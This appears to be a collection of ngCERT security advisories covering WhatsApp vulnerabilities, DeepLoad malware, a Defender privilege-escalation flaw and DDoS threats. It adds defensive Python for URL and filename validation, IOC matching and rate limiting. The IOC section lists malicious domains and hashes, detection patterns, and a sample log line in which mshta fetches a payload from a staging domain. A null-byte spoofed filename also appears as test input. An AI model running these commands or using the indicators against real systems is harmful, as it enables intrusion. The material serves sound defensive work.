Advisory ID: ngCERT-2026-050005
SUMMARY
A vulnerability has been identified in WhatsApp on iOS, Android, and Windows involving the processing of rich media responses linked to Instagram Reels content, tracked as CVE-2026-23866. The vulnerability may allow attackers to manipulate embedded metadata and trigger arbitrary or attacker-controlled URLs. This flaw can be exploited remotely through crafted messages, enabling phishing, malicious redirection, and potential cross-application invocation via unsafe URL handling. The issue increases exposure to social engineering-driven attacks within trusted messaging environments.
DESCRIPTION
The vulnerability CVE-2026-23866 is caused by inadequate validation of AI-generated rich response messages linked to Instagram Reels within WhatsApp. When users receive or interact with such messages, the application fails to properly validate embedded media URLs. This enables attackers to craft malicious content that forces victims' devices to retrieve and process data from attacker-controlled sources, potentially triggering operating system-level URL scheme handlers without user consent. This vulnerability affects WhatsApp for iOS (v2.25.8.0 to v2.26.15.72) and WhatsApp for Android (v2.25.8.0 to v2.26.7.10).

In addition, CVE-2026-23863 affects WhatsApp for Windows (versions prior to v2.3000.1032164386.258709). CVE-2026-23863 is classified as an attachment spoofing vulnerability arising from improper handling of filenames containing embedded null bytes (\x00). It allows attackers to disguise malicious files as legitimate attachments by exploiting differences between application-level and system-level filename interpretation, requiring only minimal user interaction (a single click) and no special privileges to exploit.
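The two weaknesses above both come down to input that is accepted at one layer and interpreted differently at another: a media URL whose scheme is handed to the operating system, and a filename that an application-level (Unicode) string holds in full while a NUL-terminated system call truncates it. The following Python is an added, defender-side illustration, not code from WhatsApp or from the advisory: `is_safe_media_url` allowlists only `http`/`https` URLs with a hostname, and `is_safe_attachment_name` rejects names that a NUL-terminated consumer would see differently from the application. The function names and the sample inputs are constructed for the example.

```python
from urllib.parse import urlsplit

# Only plain web URLs may be fetched from rich media metadata; every other
# scheme (custom app handlers, file:, javascript:, tel:, ...) is refused so a
# crafted message cannot reach an OS-level URL scheme handler.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_media_url(url: str) -> bool:
    """Allowlist check for a URL embedded in rich media metadata."""
    # Control characters (including NUL) can split the URL between parsers.
    if not url or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    # urlsplit lowercases the scheme; a hostname must be present so that
    # "https:///path" and scheme-relative "//host/path" are also rejected.
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


def system_level_name(filename: str) -> str:
    """How a NUL-terminated (C string) API would see the same filename."""
    return filename.split("\x00", 1)[0]


def interpretation_mismatch(filename: str) -> bool:
    """True when the application and the OS would not agree on the name."""
    return system_level_name(filename) != filename


def is_safe_attachment_name(filename: str) -> bool:
    """Reject attachment names that can be spoofed or used for traversal."""
    if not filename or len(filename) > 255:
        return False
    # Embedded NUL and other control characters are the spoofing vector.
    if any(ord(ch) < 0x20 for ch in filename):
        return False
    # Path separators and dot entries must never come from a remote peer.
    if "/" in filename or "\\" in filename or filename in (".", ".."):
        return False
    return True


if __name__ == "__main__":
    # Constructed sample inputs for the demonstration.
    spoofed = "invoice.pdf\x00.exe"
    print(system_level_name(spoofed))              # invoice.pdf
    print(interpretation_mismatch(spoofed))        # True
    print(is_safe_attachment_name(spoofed))        # False
    print(is_safe_media_url("https://cdn.example/reel.mp4"))  # True
    print(is_safe_media_url("customapp://open?x=1"))          # False
```

The key design point is to validate the received byte string before it is used for either display or storage, so that the name the user sees and the name the filesystem receives are guaranteed to be the same string.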
Damage: Critical
Probability: Medium
Platform(s): iOS, Android, Windows
CONSEQUENCES
Successful exploitation of the vulnerability could lead to:
- Execution of malicious or unintended URL schemes.
- Unauthorised invocation of system-level applications or services.
- Delivery of phishing content or malware.
- Attachment spoofing, resulting in user deception.
- Potential compromise of sensitive information and device security.
SOLUTION/MITIGATION
ngCERT advises the following measures:
- Update WhatsApp for iOS, Android and Windows to versions later than v2.26.15.72, v2.26.7.10 and 2.3000.1038897100.261501, respectively.
- Apply mobile device management (MDM) policies enforcing mandatory app updates across enterprise environments.
- Monitor network traffic for anomalous URL scheme invocations originating from messaging applications.
- Educate users about risks associated with AI-generated rich media content in messaging platforms.
HYPERLINK
- https://www.whatsapp.com/security/advisories/2026
- https://cyberpress.org/whatsapp-flaw-lets-attackers-use-instagram/#google_vignette
- https://cybersecuritynews.com/whatsapp-vulnerability-leverage-instagram-reels/
Advisory ID: ngCERT-2026-040008
SUMMARY
ngCERT is issuing an alert about DeepLoad malware infections that threaten system integrity and enterprise credentials nationwide. DeepLoad is a fileless Windows malware loader delivered primarily through ClickFix-style social engineering. It employs AI-generated obfuscation, in-memory execution, and advanced persistence mechanisms. Infection by this malware could lead to immediate credential theft, system compromise, persistent access, browser hijacking, lateral movement through USB media, and data exfiltration. To mitigate these risks, organisations and individuals are advised to take proactive steps by applying the recommendations captured herein.
DESCRIPTION
DeepLoad malware spreads via ClickFix social engineering, tricking victims with fake browser errors that prompt them to paste malicious PowerShell commands into the Windows Run dialogue. The command downloads and executes an obfuscated loader through mshta.exe. Once running, DeepLoad decrypts shellcode in memory, injects it into trusted processes, and evades detection with AI-generated noise. Persistence is maintained through scheduled tasks and WMI event subscriptions. It can drop a credential stealer (filemanager.exe), install a malicious browser extension, and spread through disguised USB shortcuts. Newer variants employ fileless execution, native API calls, disabled PowerShell history, and randomised artefacts, making detection and cleanup highly challenging.
Damage: Critical
Probability: High
Platform(s): Windows Systems
CONSEQUENCES
Infection with DeepLoad malware can result in:
- System compromise and multi-layered persistence.
- Immediate and ongoing credential theft.
- Installation of rogue browser extensions and browser data interception.
- Lateral movement and widespread network/USB infections.
- Reputational damage.
INDICATORS OF COMPROMISE (IOCs):
1. File Hashes (SHA256):
a. 1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d (filemanager.exe – standalone credential stealer)
b. 6AABA685669D779EF8BE8F7F4231096CFAFD0EF386F3897C5E2106C177724FC8 (domain-resolver.js)
c. AB450927B37E1B68E2BE68832C354AC600E86E2545A904D4CA0EA283F2600CC2 (api-client.js)
2. Network Indicators:
a. Staging domains: holiday-updateservice[.]com, forest-entity[.]cc
b. Supporting infrastructure: hell1-kitty[.]cc
SOLUTION/MITIGATION
To reduce risk and impact, organisations should:
- Apply timely patches to Windows systems and applications to prevent exploitation of vulnerabilities used for initial infection.
- Deploy Endpoint Detection and Response (EDR) tools with behavioural analysis to identify fileless infections, APC injection, WMI abuse, and suspicious PowerShell activity.
- Enable PowerShell Script Block Logging and monitor for -ep Bypass, mshta.exe, and unexpected outbound connections.
- Regularly audit and remove unauthorised WMI event subscriptions and scheduled tasks; treat removable media from potentially infected systems as compromised.
- Implement network segmentation, block known malicious domains, and monitor for anomalous traffic to suspicious infrastructure.
- Train users on ClickFix-style social engineering (never paste commands from browser prompts into Run or PowerShell) and safe browsing practices.
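The indicators listed above and the monitoring advice (mshta.exe launches, `-ep Bypass`, WMI event subscriptions, connections to the staging domains) can be turned into a small matcher that a SOC can run over endpoint telemetry. The Python below is an added example, not tooling from the advisory or from any vendor named in the links: it carries the advisory's hashes and domains verbatim (domains refanged from the `[.]` notation), and runs them, together with the behavioural patterns, over a few constructed Sysmon-style log lines. The log lines, field layout and function names are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# SHA256 indicators quoted from the advisory, lowercased because Sysmon and
# most EDR products emit hex in varying case.
IOC_HASHES: Dict[str, str] = {
    "1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d": "filemanager.exe",
    "6aaba685669d779ef8be8f7f4231096cfafd0ef386f3897c5e2106c177724fc8": "domain-resolver.js",
    "ab450927b37e1b68e2be68832c354ac600e86e2545a904d4ca0ea283f2600cc2": "api-client.js",
}

# The advisory defangs domains with "[.]"; refang once so they can be compared
# with real DNS and proxy telemetry.
IOC_DOMAINS = {d.replace("[.]", ".") for d in (
    "holiday-updateservice[.]com", "forest-entity[.]cc", "hell1-kitty[.]cc")}

# Behavioural patterns from the mitigation guidance: mshta.exe, -ep Bypass,
# and the WMI namespace where event subscriptions are created.
BEHAVIOUR_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\bmshta(?:\.exe)?\b", re.I), "mshta.exe launch"),
    (re.compile(r"(?:^|\s)-(?:ep|ExecutionPolicy)\s+Bypass\b", re.I), "PowerShell -ep Bypass"),
    (re.compile(r"root\\subscription", re.I), "WMI event subscription activity"),
]
HASH_RE = re.compile(r"SHA256=([0-9a-fA-F]{64})")


def scan_line(line: str) -> List[str]:
    """Return the names of every indicator matched by one telemetry line."""
    hits: List[str] = []
    lowered = line.lower()
    for m in HASH_RE.finditer(line):
        name = IOC_HASHES.get(m.group(1).lower())
        if name:
            hits.append(f"known hash: {name}")
    for domain in IOC_DOMAINS:
        if domain in lowered:
            hits.append(f"staging/C2 domain: {domain}")
    for pattern, label in BEHAVIOUR_PATTERNS:
        if pattern.search(line):
            hits.append(label)
    return hits


def scan(lines) -> List[Tuple[int, str, List[str]]]:
    """Scan many lines; yields (line number, line, hits) for matching lines."""
    return [(i, ln, h) for i, ln in enumerate(lines, 1) if (h := scan_line(ln))]


# Constructed sample telemetry in a Sysmon-like key=value layout; these are
# NOT records from a real infected host.
SAMPLE_LOG = [
    "EventID=1 Image=C:\\Windows\\System32\\mshta.exe CommandLine=\"mshta https://holiday-updateservice.com/x.hta\" ParentImage=C:\\Windows\\explorer.exe",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=\"powershell -ep Bypass -w hidden -c ...\"",
    "EventID=11 Image=C:\\Windows\\System32\\mshta.exe TargetFilename=C:\\Users\\Public\\filemanager.exe Hashes=SHA256=1432393691B415D0CD4680D9CEE73E60896FBE63300D9F0355C96E91817E4B1D",
    "EventID=22 QueryName=forest-entity.cc QueryResults=203.0.113.10",
    "EventID=1 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe CommandLine=\"firefox.exe\" ParentImage=C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for lineno, _, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Hash and domain matches are high-confidence and can be alerted on directly; the behavioural patterns are noisier (mshta.exe and `-ep Bypass` do occur in legitimate administration) and are better correlated with the parent process and the network destination, which is why the sample keeps `ParentImage` and the URL on the same line.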
HYPERLINK
- https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion
- https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
- https://www.securityweek.com/new-deepload-malware-dropped-in-clickfix-attacks/
- https://socprime.com/active-threats/deepload-malware-pairs-clickfix-delivery/
Advisory ID: ngCERT-2026-040006
SUMMARY
ngCERT has identified a newly disclosed zero-day vulnerability (CVE-2026-33825) affecting the Microsoft Defender Antimalware Platform. The vulnerability was disclosed on 14 April 2026, as part of Microsoft Patch Tuesday updates. This flaw allows threat actors to perform elevation-of-privilege (EoP) attacks, enabling them to bypass standard access controls and gain SYSTEM-level privileges on affected Windows systems. Although exploitation requires prior access to a target machine, this vulnerability poses a significant risk in post-compromise scenarios and is likely to be exploited by advanced cybercriminals to achieve full system control. Accordingly, ngCERT strongly advises government, private organisations, and the general public to urgently apply the relevant security updates to mitigate potential exploitation.
DESCRIPTION
The vulnerability exists within the Microsoft Defender Antimalware Platform due to insufficient access-control granularity (CWE-1220). This weakness allows improper handling of privileged operations within Defender components. An attacker with local access to a system can exploit this flaw by interacting with vulnerable Defender processes or services in a way that bypasses intended permission boundaries. Successful exploitation results in privilege escalation to the SYSTEM level, the highest privilege tier in Windows environments. Once elevated, the attacker can execute arbitrary code, manipulate system processes, disable security controls, and establish persistent access. This vulnerability is particularly dangerous because Microsoft Defender operates with elevated privileges by default, making it an attractive target for attackers seeking to expand their control after initial compromise. Although the vulnerability does not allow direct remote exploitation, it can be combined with other attack vectors such as phishing, malware infection, or remote code execution to achieve full system compromise.
Damage: Critical
Probability: High
Platform(s): Windows systems
CONSEQUENCES
Successful exploitation of the vulnerability could lead to:
- Privilege escalation.
- Security control bypass.
- Persistence.
- Credential theft and lateral movement.
- Full system compromise.
SOLUTION/MITIGATION
The following mitigations are strongly recommended:
- Apply Microsoft Security Updates Immediately.
- Ensure Defender Platform is Up to Date.
- Limit Local Access.
- Enable Endpoint Detection and Response (EDR).
- Monitor Defender Services.
- Implement Application Control Policies.
- Conduct Regular Patch Management.
- User Awareness and Phishing Protection.
HYPERLINK
Advisory ID: ngCERT-2026-040007
SUMMARY
ngCERT has observed a significant rise in high-impact cybersecurity incidents affecting organisations across multiple sectors within Nigeria, driven by phishing, ransomware, business email compromise (BEC), and data breaches. These threats are increasingly enabled by “as-a-service” cybercrime models and AI-driven techniques, allowing threat actors to scale operations and exploit weak security controls across the ecosystem. Private and public sector organisations, particularly the Critical National Information Infrastructure (CNII), are advised to strengthen their cybersecurity posture and remediate identified vulnerabilities urgently.
DESCRIPTION
The surge in cybersecurity incidents in Nigeria reveals a pattern of high-frequency and increasingly sophisticated attacks targeting public and private sector organisations. Threat actors are leveraging phishing campaigns, credential harvesting, ransomware deployment, and exploitation of unpatched systems to gain unauthorised access to networks. The proliferation of phishing-as-a-service and ransomware-as-a-service platforms has lowered the barrier to entry for cybercriminals, enabling coordinated and large-scale attacks. Additionally, the use of automation and artificial intelligence has enhanced cybercriminals' ability to conduct convincing social engineering, evade detection, and exploit vulnerabilities more efficiently. These threats disproportionately affect sectors such as financial services, telecommunications, government institutions, healthcare, and other critical national infrastructure, where data sensitivity and system availability are mission-critical. Many of these incidents are linked to common weaknesses, including poor identity and access management, lack of multi-factor authentication, inadequate patching, and low user awareness and staff training.
Damage: Critical
Probability: High
Platform(s): Web Applications, Cloud Services and Email
CONSEQUENCES
If successfully exploited, these cybersecurity threats may result in:
- Financial losses due to fraud, ransomware payments, and incident response costs.
- Operational disruption, including system downtime and service outages.
- Unauthorized access to systems and compromise of sensitive data.
- Data breaches/exfiltration leading to privacy violations and regulatory penalties.
- Reputational damage and erosion of customer and stakeholder trust.
- Compromise of critical infrastructure, with potential national security implications.
SOLUTION/MITIGATION
ngCERT recommends the following:
- Enforce multi-factor authentication (MFA) across all critical systems and services.
- Implement endpoint detection and response (EDR/XDR) and continuous network monitoring.
- Regularly patch and update systems, applications, and network devices.
- Adopt a Zero Trust security model and enforce least-privilege access controls.
- Conduct regular vulnerability assessments and penetration testing.
- Strengthen employee cybersecurity awareness through training and phishing simulations.
- Encrypt sensitive data and maintain secure, offline backups to mitigate ransomware risks.
- Organisations are further advised to promptly report confirmed incidents to ngCERT, or call 090 5555 4499, for timely support and coordinated response in line with the National Cybersecurity Policy and Strategy 2015 (As Amended 2024).
HYPERLINK
Advisory ID: ngCERT-2026-040009
SUMMARY
ngCERT alerts all critical sectors to the persistent and escalating threat of Distributed Denial-of-Service (DDoS) attacks within Nigeria's cyberspace. Threat actors are leveraging botnets, amplification techniques, and exploitation of known vulnerabilities to disrupt the availability of essential services within government and private systems. These attacks are increasingly multi-vector and may be combined with other malicious activities, posing significant risks to national resilience and economic stability. Organisations are strongly advised to review this advisory against their DDoS preparedness posture and to ensure that posture aligns with national incident response frameworks.
DESCRIPTION
A DDoS attack is a coordinated cyber operation in which multiple compromised systems, often forming botnets of infected servers, endpoints, and Internet of Things (IoT) devices, are used to overwhelm a target system, network, or application with excessive traffic, thereby exhausting its resources and rendering services unavailable to legitimate users. These attacks may manifest as volumetric floods that saturate bandwidth, protocol-based attacks that exploit weaknesses in network layers, or application-layer attacks that mimic legitimate user requests to evade detection. Threat actors frequently exploit known vulnerabilities such as CVE-2018-10561, CVE-2021-44228, CVE-2019-19781, CVE-2018-7600, and CVE-2020-25705 to compromise systems and expand botnet infrastructure, while also employing reflection and amplification techniques (e.g., DNS, NTP, Memcached) to significantly magnify attack traffic.
Damage: Critical
Probability: High (CVSS Score 6.6 to 10.0)
Platform(s): All web domains
CONSEQUENCES
If successfully exploited, this campaign may result in:
- Disruption of critical services and prolonged system downtime.
- Financial losses due to operational interruption and mitigation costs.
- Degradation of national critical infrastructure resilience.
- Reputational damage and erosion of public trust.
- Exploitation as a diversion for ransomware or data exfiltration attacks.
- Exposure to regulatory and compliance sanctions.
SOLUTION/MITIGATION
ngCERT recommends the following:
- Activate incident response and escalate internally.
- Engage ISPs for traffic filtering and mitigation.
- Enable DDoS protection (scrubbing, rate limiting, filtering).
- Block malicious IPs and restrict non-essential traffic.
- Patch vulnerabilities, including CVE-2021-44228, CVE-2019-19781, and CVE-2018-7600.
- Harden systems and disable unused services.
- Deploy Web Application Firewalls and Intrusion Prevention Systems, and anti-DDoS solutions.
- Implement anti-spoofing per Internet Engineering Task Force (IETF) Best Current Practices 38.
- Ensure redundancy, load balancing, and auto-scaling.
- Monitor traffic continuously and detect anomalies.
- Report any incidents to ngCERT and share IOCs.
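Of the measures above, rate limiting is the one an application team can implement on its own, and it is the control that addresses the application-layer floods described earlier (requests that look legitimate individually but arrive far faster than any real client sends them). The Python below is an added example, not code from the advisory or from any DDoS product: a per-source sliding-window limiter driven by constructed traffic in which one client sends 5 requests per second and one source floods at 200 per second. Integer millisecond timestamps are used deliberately so the window arithmetic is exact. The class and function names, the limits and the addresses are assumptions made for the example.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Tuple


class SlidingWindowLimiter:
    """Allow at most `limit` requests from one source in any `window_ms` span."""

    def __init__(self, limit: int, window_ms: int) -> None:
        self.limit = limit
        self.window_ms = window_ms
        # Timestamps (ms) of requests that were allowed, per source.
        self._hits: Dict[str, Deque[int]] = defaultdict(deque)

    def allow(self, source: str, now_ms: int) -> bool:
        q = self._hits[source]
        cutoff = now_ms - self.window_ms
        # Drop allowed requests that have aged out of the window.
        while q and q[0] <= cutoff:
            q.popleft()
        if len(q) >= self.limit:
            return False        # over budget: reject without recording
        q.append(now_ms)
        return True

    def prune(self, now_ms: int) -> int:
        """Forget sources idle for a full window; returns how many were dropped.

        Spoofed or highly distributed floods create a new key per source, so
        an unbounded table is itself a resource-exhaustion risk.
        """
        cutoff = now_ms - self.window_ms
        stale = [s for s, q in self._hits.items() if not q or q[-1] <= cutoff]
        for s in stale:
            del self._hits[s]
        return len(stale)

    def tracked_sources(self) -> int:
        return len(self._hits)


def simulate(limiter: SlidingWindowLimiter,
             events: Iterable[Tuple[int, str]]) -> Dict[str, List[int]]:
    """Replay (timestamp_ms, source) events; returns {source: [allowed, blocked]}."""
    stats: Dict[str, List[int]] = defaultdict(lambda: [0, 0])
    for t, src in sorted(events):
        stats[src][0 if limiter.allow(src, t) else 1] += 1
    return dict(stats)


def constructed_traffic() -> List[Tuple[int, str]]:
    """Ten seconds of constructed traffic: one normal client, one flooder."""
    legit = [(i * 200, "198.51.100.7") for i in range(50)]      # 5 req/s
    flood = [(i * 5, "203.0.113.9") for i in range(2000)]       # 200 req/s
    return legit + flood


if __name__ == "__main__":
    limiter = SlidingWindowLimiter(limit=100, window_ms=1000)
    for src, (ok, blocked) in simulate(limiter, constructed_traffic()).items():
        print(f"{src}: allowed={ok} blocked={blocked}")
    print("pruned:", limiter.prune(now_ms=20_000))
```

With a budget of 100 requests per second the normal client is never touched, while the flooder is held to the budget (1000 of its 2000 requests are rejected). A limiter like this only helps once traffic reaches the application; volumetric and reflection floods saturate the link before that point, which is why the advisory's ISP filtering, scrubbing and anti-spoofing (BCP 38) measures come first.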
HYPERLINK
- ngCERT SECURITY ADVISORY ON CRITICAL REMOTE CODE EXECUTION VULNERABILITIES IN WINDOWS ROUTING AND REMOTE ACCESS SERVICE (RRAS)
- ngCERT SECURITY ADVISORY ON MULTIPLE CRITICAL VULNERABILITIES IN ZOOM PRODUCTS
- ngCERT SECURITY ADVISORY ON CLICKFIX (PASTEJACKING) CAMPAIGN DISTRIBUTING ATOMIC macOS STEALER (AMOS)
- XP95 Ransomware Campaign Targeting Government and Critical Sectors: Immediate Preventive Measures Required